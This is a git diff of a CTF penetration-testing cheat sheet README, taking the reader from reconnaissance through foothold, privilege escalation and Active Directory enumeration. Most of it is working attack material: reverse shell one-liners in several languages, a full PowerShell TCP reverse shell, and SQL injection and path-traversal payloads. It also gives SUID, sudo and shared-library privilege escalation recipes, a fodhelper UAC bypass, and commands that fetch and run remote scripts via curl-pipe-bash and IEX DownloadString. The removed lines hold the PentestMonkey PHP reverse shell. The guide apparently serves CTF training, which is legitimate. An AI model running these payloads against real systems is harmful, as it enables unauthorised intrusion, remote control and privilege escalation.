diff --git a/README.md b/README.md index 179a083..7ff7068 100644 --- a/README.md +++ b/README.md @@ -1,441 +1,278 @@ # CTF_CheatSheet +## **Stage 1 – Lay of the Land (Enumeration)** -## Stage 1 - Lay of the Land +### Active Reconnaissance -### enumeration +| Tool | Purpose | Key Command | +|------|---------|------------| +| **Nmap** | Port scanning & service detection | `nmap -sV -sC -oA nmap/basic [IP]` | +| **Masscan** | Ultra-fast port scanning | `masscan [IP] -p 1-65535 --rate 10000 -oX masscan.xml` | +| **Netdiscover** | ARP discovery on local network | `netdiscover -i [INTERFACE]` | +| **RPC Client** | Enumerate RPC services & null sessions | `rpcclient -U "" [IP]` | +| **Enum4Linux** | SMB/LDAP/RPC enumeration | `enum4linux [IP]` | -* Active Recon - * Nmap - * Masscan - * Network discovery - * RPCClient - * Enum4all +### Passive Reconnaissance -* Passive Recon - * Shodan - * Wayback Machine - * The Harvester +| Tool | Purpose | +|------|---------| +| **Shodan** | Internet-wide device search | +| **Wayback Machine** | Historical website snapshots | +| **The Harvester** | Email and subdomain enumeration | +| **DNS Recon** | DNS enumeration and zone transfers | -* List all the subdirectories and files - * Gobuster - * Backup File Artifacts Checker +### Directory & File Enumeration +| Tool | Command | +|------|---------| +| **Gobuster (HTTP)** | `gobuster dir -u http://[URL] -w [wordlist] -t 10 -r` | +| **Gobuster (DNS)** | `gobuster dns -d [domain] -w [wordlist]` | +| **Dirb** | `dirb http://[URL] /path/to/wordlist` | +| **FFuF** | `ffuf -u http://[URL]/FUZZ -w [wordlist] -mc 200,204,301,302,307,401,403` | -#### Nmap +--- -``` -nmap -sV -sC -oA nmap/basic IP - -nmap [Scan Type] [Options] {target specification} -``` -``` -* HOST DISCOVERY: - - -sL: List Scan - simply list targets to scan - - -sn/-sP: Ping Scan - disable port scan - - -Pn: Treat all hosts as online -- skip host discovery - -* SCAN TECHNIQUES: - - -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans - - -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans - -* PORT SPECIFICATION: - - -p : Only scan specified ports - - Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9 - -* SERVICE/VERSION DETECTION: --sV: Probe open ports to determine service/version info - -* OUTPUT: --oN/-oX/-oS/-oG : Output scan in normal, XML,Output in the three major formats at once --v: Increase verbosity level (use -vv or more for greater effect) - -* MISC: --6: Enable IPv6 scanning --A: Enable OS detection, version detection, script scanning, and traceroute -``` - - -#### Masscan +## **Nmap Deep Dive** ```bash -masscan IP -p 1-65535 --rate 100 -oX masscan.xml +# Basic comprehensive scan +nmap -sV -sC -oA nmap/basic [IP] + +# All ports with version detection +nmap -p- -sV -oA nmap/full [IP] + +# Aggressive scan with OS detection +nmap -A -T4 [IP] + +# UDP scan +nmap -sU -p 53,161,162,445,500 [IP] + +# Stealth scan (SYN) +nmap -sS -p- [IP] + +# Script scan (NSE) +nmap --script vuln [IP] + +# Service version enumeration +nmap -sV --script smb-enum-shares -p 445 [IP] ``` +### Nmap Command Reference -| Option | Discription | -|--------|-------------| -| -p | Ports to scan, E.g. -p80,8000-8100 | -| --rate= | Rate of Packets-per-Second, E,g --rate=10000 = 10kpps (Too High can cause a Jam) | -| --banners | -oB : save results of scan in binary format to | -| -oX | save them as xml in | -| --open --banners --readscan -oX | read binary scan results in and save them as xml in | -| --nmap | Options Compatable with Nmap| +**HOST DISCOVERY:** +- `-sL` – List Scan +- `-sn` – Ping Scan (no port scan) +- `-Pn` – Skip host discovery, treat all as online -##### Compatable Nmap Options -``` - TARGET SPECIFICATION: - Can pass only IPv4/IPv6 address, CIDR networks, or ranges (non-nmap style) - Ex: 10.0.0.0/8, 192.168.0.1, 10.0.0.1-10.0.0.254 - -iL : Input from list of hosts/networks - --exclude : Exclude hosts/networks - --excludefile : Exclude list from file - --randomize-hosts: Randomize order of hosts (default) -HOST DISCOVERY: - -Pn: Treat all hosts as online (default) - -n: Never do DNS resolution (default) -SCAN TECHNIQUES: - -sS: TCP SYN (always on, default) -SERVICE/VERSION DETECTION: - --banners: get the banners of the listening service if available. The - default timeout for waiting to receive data is 30 seconds. -PORT SPECIFICATION AND SCAN ORDER: - -p : Only scan specified ports - Ex: -p22; -p1-65535; -p 111,137,80,139,8080 -TIMING AND PERFORMANCE: - --max-rate : Send packets no faster than per second - --connection-timeout : time in seconds a TCP connection will - timeout while waiting for banner data from a port. -FIREWALL/IDS EVASION AND SPOOFING: - -S/--source-ip : Spoof source address - -e : Use specified interface - -g/--source-port : Use given port number - --ttl : Set IP time-to-live field - --spoof-mac : Spoof your MAC address -OUTPUT: - --output-format : Sets output to binary/list/unicornscan/json/ndjson/grepable/xml - --output-file : Write scan results to file. If --output-format is - not given default is xml - -oL/-oJ/-oD/-oG/-oB/-oX/-oU : Output scan in List/JSON/nDjson/Grepable/Binary/XML/Unicornscan format, - respectively, to the given filename. Shortcut for - --output-format --output-file - -v: Increase verbosity level (use -vv or more for greater effect) - -d: Increase debugging level (use -dd or more for greater effect) - --open: Only show open (or possibly open) ports - --packet-trace: Show all packets sent and received - --iflist: Print host interfaces and routes (for debugging) - --append-output: Append to rather than clobber specified output files - --resume : Resume an aborted scan -MISC: - --send-eth: Send using raw ethernet frames (default) - -V: Print version number - -h: Print this help summary page. -EXAMPLES: - masscan -v -sS 192.168.0.0/16 10.0.0.0/8 -p 80 - masscan 23.0.0.0/0 -p80 --banners -output-format binary --output-filename internet.scan - masscan --open --banners --readscan internet.scan -oG internet_scan.grepable -``` +**SCAN TECHNIQUES:** +- `-sS` – TCP SYN (stealthy) +- `-sT` – TCP Connect +- `-sU` – UDP Scan +- `-sA` – ACK Scan +- `-sN/-sF/-sX` – NULL/FIN/Xmas Scans +**PORT SPECIFICATION:** +- `-p 22,80,443` – Specific ports +- `-p 1-65535` – All ports +- `-p U:53,T:80` – Mixed UDP/TCP +**OUTPUT:** +- `-oN` – Normal +- `-oX` – XML +- `-oG` – Grepable +- `-oA` – All formats -#### Netdiscover +--- -``` -netdiscover -i -``` - - -#### DirBuster / GoBuster +## **Masscan Reference** ```bash - ./gobuster -u http://buffered.io/ -w /secondary/wordlists/more-lists/dirb/ -t 10 - -u url - -w wordlist - -t threads +# Fast scan all ports +masscan [IP/CIDR] -p 1-65535 --rate 10000 -oX output.xml - More subdomain : - ./gobuster -m dns -w subdomains.txt -u google.com -i +# Grab banners +masscan [IP/CIDR] -p 80,443,8080 --banners -oX output.xml - gobuster -w wordlist -u URL -r -e /secondary/wordlists/more-lists/dirb/ +# Read and convert binary results +masscan --open --banners --readscan input.bin -oX output.xml ``` +--- -## Stage 2 - Foothold +## **Stage 2 – Initial Access (Foothold)** +### Web Exploitation -### Attacking - Web Reverse Shells +#### Common Web Vulns to Exploit -Kali / Parrot OS +| Vulnerability | Description | Exploitation | +|---|---|---| +| **SQL Injection** | Database query manipulation | `' OR '1'='1'; --` | +| **XSS** | JavaScript injection in DOM | `` | +| **CSRF** | Cross-Site Request Forgery | Forge requests with valid session tokens | +| **Path Traversal** | Access files outside intended dir | `../../../etc/passwd` | +| **XXE** | XML External Entity injection | `]>` | +| **SSRF** | Server-Side Request Forgery | `http://localhost:8080/admin` | +| **Command Injection** | OS command execution | `; cat /etc/passwd` | +| **LFI/RFI** | Local/Remote File Inclusion | `?file=../../../../etc/passwd` | + +#### SQLMap + +```bash +# Basic SQL injection test +sqlmap -u "http://[URL]?id=1" --dbs + +# Dump all databases +sqlmap -u "http://[URL]?id=1" --dump-all + +# OS shell +sqlmap -u "http://[URL]?id=1" --os-shell + +# POST request +sqlmap -u "http://[URL]" --data="user=admin&pass=test" -p user --dbs ``` -cd /usr/share/webshells/ + +#### Burp Suite Workflow + +1. **Capture traffic** in Proxy +2. **Send to Repeater** for manual testing +3. **Send to Intruder** for fuzzing/brute force +4. **Scanner** for automated vulnerability detection +5. **Decoder** for encoding/decoding payloads + +#### Web Shell Uploads + +```bash +# Test file upload with shell +# Common shell names: shell.php, index.php, upload.php + +# Check upload bypass techniques: +# - shell.php.jpg +# - shell.jpg.php +# - shell.php%00.jpg +# - shell.phtml +# - shell.shtml +# - shell.phar ``` +### Reverse Shells & Initial Access + +#### Listener Setup + +```bash +# Netcat listener +nc -lvnp [PORT] + +# Multi-handler (Metasploit) +msfconsole +> use exploit/multi/handler +> set PAYLOAD windows/meterpreter/reverse_tcp +> set LHOST [YOUR_IP] +> set LPORT [PORT] +> run +``` + +#### Reverse Shell Payloads + +| Language | Command | +|----------|---------| +| **Bash** | `bash -i >& /dev/tcp/[IP]/[PORT] 0>&1` | +| **Python** | `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IP]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'` | +| **PHP** | `php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'` | +| **Node.js** | `require('child_process').exec("bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1'");` | +| **PowerShell** | `powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IP]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()` | +| **Java** | See payload generators at http://www.jackson-t.ca/runtime-exec-payloads.html | + + #### PentestMonkey PHP Reverse Shell +php-reverse-shell - A Reverse Shell implementation in PHP +**PentestMonkey PHP Reverse Shell:** A Reverse Shell implementation in PHP - Check https://github.com/pentestmonkey/php-reverse-shell -* php-reverse-shell - A Reverse Shell implementation in PHP -* Copyright (C) 2007 pentestmonkey@pentestmonkey.net -``` - array("pipe", "r"), // stdin is a pipe that the child will read from - 1 => array("pipe", "w"), // stdout is a pipe that the child will write to - 2 => array("pipe", "w") // stderr is a pipe that the child will write to -); - -$process = proc_open($shell, $descriptorspec, $pipes); - -if (!is_resource($process)) { - printit("ERROR: Can't spawn shell"); - exit(1); -} - -// Set everything to non-blocking -// Reason: Occsionally reads will block, even though stream_select tells us they won't -stream_set_blocking($pipes[0], 0); -stream_set_blocking($pipes[1], 0); -stream_set_blocking($pipes[2], 0); -stream_set_blocking($sock, 0); - -printit("Successfully opened reverse shell to $ip:$port"); - -while (1) { - // Check for end of TCP connection - if (feof($sock)) { - printit("ERROR: Shell connection terminated"); - break; - } - - // Check for end of STDOUT - if (feof($pipes[1])) { - printit("ERROR: Shell process terminated"); - break; - } - - // Wait until a command is end down $sock, or some - // command output is available on STDOUT or STDERR - $read_a = array($sock, $pipes[1], $pipes[2]); - $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); - - // If we can read from the TCP socket, send - // data to process's STDIN - if (in_array($sock, $read_a)) { - if ($debug) printit("SOCK READ"); - $input = fread($sock, $chunk_size); - if ($debug) printit("SOCK: $input"); - fwrite($pipes[0], $input); - } - - // If we can read from the process's STDOUT - // send data down tcp connection - if (in_array($pipes[1], $read_a)) { - if ($debug) printit("STDOUT READ"); - $input = fread($pipes[1], $chunk_size); - if ($debug) printit("STDOUT: $input"); - fwrite($sock, $input); - } - - // If we can read from the process's STDERR - // send data down tcp connection - if (in_array($pipes[2], $read_a)) { - if ($debug) printit("STDERR READ"); - $input = fread($pipes[2], $chunk_size); - if ($debug) printit("STDERR: $input"); - fwrite($sock, $input); - } -} - -fclose($sock); -fclose($pipes[0]); -fclose($pipes[1]); -fclose($pipes[2]); -proc_close($process); - -// Like print, but does nothing if we've daemonised ourself -// (I can't figure out how to redirect STDOUT like a proper daemon) -function printit ($string) { - if (!$daemon) { - print "$string\n"; - } -} - -?> -``` - -* Short One-Line PHP Reverse Shell Injection -``` -php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' -``` - - -#### Built-in Tools - -| Program | Command | -|----------|---------| -| Netcat Listen | ncat -lvnp 4444 | -| Bash | bash -i >& /dev/tcp/IP/4444 0>&1 | -| Bash | bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' | -| PHP | php -r '$sock=fsockopen("^IP^",4444);exec("/bin/sh -i <&3 >&3 2>&3");'` | -| Netcat Connect | nc -e /bin/sh ^IP^ 4444`| -| Telnet | mknod backpipe p && telnet ^IP^ 4444 0backpipe` | -| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` | -| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` | -| Node.js | var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(4444, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); | -| | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/4444 0>&1'");` | -| Java | Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` | -| Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html | -| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 4444 -e cmd | - - - -#### Spawning a Shell - -To check if the shell is a tty shell, just enter tty command like the following. +#### Upgrade Shell to TTY (Linux) ```bash +# Check if TTY tty -``` -not a tty -```bash -tty -``` -/dev/pts/0 +# Upgrade with Python +python3 -c "import pty;pty.spawn('/bin/bash')" -Here are some commands which will enable you to spawn a tty shell: -Python: - -This is the most popular method for spawnings a tty shell. The target server should have python or python3 installed. - - |Methord | Command | - |----------|-----------| - | * Python | python -c "import pty;pty.spawn('/bin/bash')" | - | * Python3 | python3 -c "import pty;pty.spawn('/bin/bash')" | - | * Echo: | echo 'os.system('/bin/bash')'| - | * sh: | /bin/sh -i| - | * Bash: | /bin/bash -i| - | * Perl: | perl -e 'exec "/bin/sh";'| - | * Ruby: | ruby: exec "/bin/sh"| - | * Lua: | lua: os.execute('/bin/sh')| - | * From within vi: | :!bash , :set shell=/bin/bash:shell | - | * From within nmap: | !sh | - - - To make the Shell Usable: -``` -Ctrl+Z -stty raw -echo -fg +# Full interactive terminal +stty raw -echo; fg export TERM=xterm ``` +#### Windows Reverse Shell (PowerShell) +```powershell +# Powershell reverse shell +$client = New-Object System.Net.Sockets.TCPClient("[IP]",[PORT]) +$stream = $client.GetStream() +[byte[]]$bytes = 0..65535|%{0} +while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i) + $sendback = (iex $data 2>&1 | Out-String) + $sendback2 = $sendback + "PS " + (pwd).Path + "> " + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) + $stream.Write($sendbyte,0,$sendbyte.Length) + $stream.Flush() +} +$client.Close() -## Stage 3 - Post Exploitation - -### Lets Have a Look Around - -##### PEASS-ng - -| OS | Links | -|----|------| -| Linux | https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/linpeas.sh | -| Windows x68 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe | -|Windows x86 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe | - - - -### Escalate Privileges - - -##### SUID - -* Find SUID Files -| Command| Discription | -|--------|-------------| -| find / -user root -perm -4000 2>/dev/null | Find SUID Files | - - -* SUID Cheatsheet - * systemctl +# One-liner +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[IP]',[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` -cd /tmp -TF=$(mktemp).service -echo '[Service] -Type=oneshot -ExecStart=/bin/sh -c "COMMAND HERE" -[Install] -WantedBy=multi-user.target' > $TF -systemctl link $TF -systemctl enable --now $TF + +--- + +## **Stage 3 – Privilege Escalation** + +### Linux Privilege Escalation + +#### Quick Enumeration + +```bash +# Check current user and groups +id +whoami +groups + +# Kernel version +uname -a +cat /etc/os-release + +# Check SUID binaries +find / -user root -perm -4000 2>/dev/null + +# Check for writable directories +find / -type d -writable 2>/dev/null + +# Check sudo permissions +sudo -l + +# Check cron jobs +crontab -l +cat /etc/cron* -l + +# Check installed applications +apt list --installed +pip list +npm list -g ``` - * Create a Service that will give `/bin/bash` a Root SUID + +#### SUID Exploitation + +**Find SUID binaries:** +```bash +find / -user root -perm -4000 2>/dev/null ``` + +**Exploit with GTFOBins:** Check https://gtfobins.github.io/ for SUID/sudo escapes + +**Common SUID Exploits:** + +```bash +# systemctl privilege escalation cd /tmp TF=$(mktemp).service echo '[Service] @@ -446,17 +283,177 @@ WantedBy=multi-user.target' > $TF systemctl link $TF systemctl enable --now $TF /tmp/bash -p + +# Find library injection opportunities +ldd /path/to/suid/binary + +# Shared library hijacking +mkdir -p /tmp/lib +echo 'int __libc_start_main() { system("bash"); return 0; }' > /tmp/lib/evil.c +gcc -shared -fPIC /tmp/lib/evil.c -o /tmp/lib/evil.so +LD_LIBRARY_PATH=/tmp/lib:/usr/lib /path/to/suid/binary ``` +#### Capability Escalation -Search [GTFO Bins](https://gtfobins.github.io/) for exploits +```bash +# Check for capabilities +getcap -r / 2>/dev/null +# Exploit (example: cap_setuid) +# Look up on GTFOBins for specific binary +``` +#### Sudo Exploitation +```bash +# Check sudo permissions +sudo -l -##### Linux Tools +# If ALL=(ALL) NOPASSWD: /usr/bin/python3 +sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')" +# Exploiting wildcards in sudo commands +# If: sudo /usr/bin/script.sh /tmp/* +# Create: /tmp/evil.sh +``` +#### Kernel Exploitation +```bash +# Find kernel exploits +# Use: searchsploit, Exploit-DB +# Common kernels: +# 4.4.0-21 – CVE-2016-5195 (Dirty COW) +# 5.4.0 – overlayfs exploit +gcc -o exploit exploit.c +./exploit +``` +#### PEASS Enumeration + +```bash +# Download and run linPEAS +curl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash + +# Or: +wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh +chmod +x linpeas.sh +./linpeas.sh +``` + +--- + +### Windows Privilege Escalation + +#### Quick Enumeration + +```powershell +# Current user and groups +whoami +whoami /groups +net user %USERNAME% + +# System info +systeminfo +Get-ComputerInfo + +# Check privileges +whoami /priv + +# List installed applications +Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName +``` + +#### Windows Privilege Escalation Vectors + +| Vector | Check | Exploitation | +|--------|-------|--------------| +| **Unquoted Service Paths** | `wmic service list brief` | Place exe in path before target | +| **Weak Service Permissions** | `accesschk.exe -ucqv [SERVICE]` | Modify service binary or path | +| **AlwaysInstallElevated** | Registry check | `msiexec /i shell.msi /qn` | +| **Scheduled Tasks** | `schtasks /query /v` | Replace task binary | +| **Weak Registry Permissions** | Check ACLs on HKLM | Modify to point to malicious binary | +| **Kernel Exploits** | `systeminfo` for OS version | Search Exploit-DB | +| **UAC Bypass** | Check UAC status | Use bypassuac tools or exploits | + +#### WinPEAS + +```powershell +# Download and run WinPEAS +IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1') + +# Or direct binary +.\winPEASx64.exe +``` + +#### Common Windows Exploits + +```powershell +# Unquoted service path exploitation +# Service: C:\Program Files\App\Service.exe +# Create: C:\Program.exe or C:\Program Files\App.exe + +# AlwaysInstallElevated exploitation +msiexec /i malicious.msi /qn /norestart + +# Scheduled task exploitation (if you can write to task location) +schtasks /create /tn evil /tr "C:\path\to\malicious.exe" /sc minute /mo 1 + +# UAC bypass - fodhelper.exe +New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd.exe /c C:\path\to\payload.exe" -Force +fodhelper.exe +``` + +--- + +## **Stage 4 – Active Directory (AD)** + +### AD Enumeration + +#### Basic Tools & Commands + +```powershell +# Get domain info +[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() + +# List domain users +Get-ADUser -Filter * | Select Name, SamAccountName + +# List domain groups +Get-ADGroup -Filter * | Select Name + +# List group members +Get-ADGroupMember "Domain Admins" + +# Check current user's groups +whoami /groups + +# Find trusts +Get-ADTrust -Filter * +``` + +#### PowerView (AD Recon Toolkit) + +```powershell +# Download PowerView +IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') + +# Get domain info +Get-NetDomain +Get-NetForest + +# Enumerate users +Get-NetUser | Select name, lastlogon, pwdlastset +Get-NetUser -UACFilter DONT_EXPIRE_PASSWORD + +# Find interesting shares +Invoke-ShareFinder + +# Get group membership +Get-NetGroup "Domain Admins" | Get-NetGroupMember + +# Find admin users +Get-NetUser -Admin +```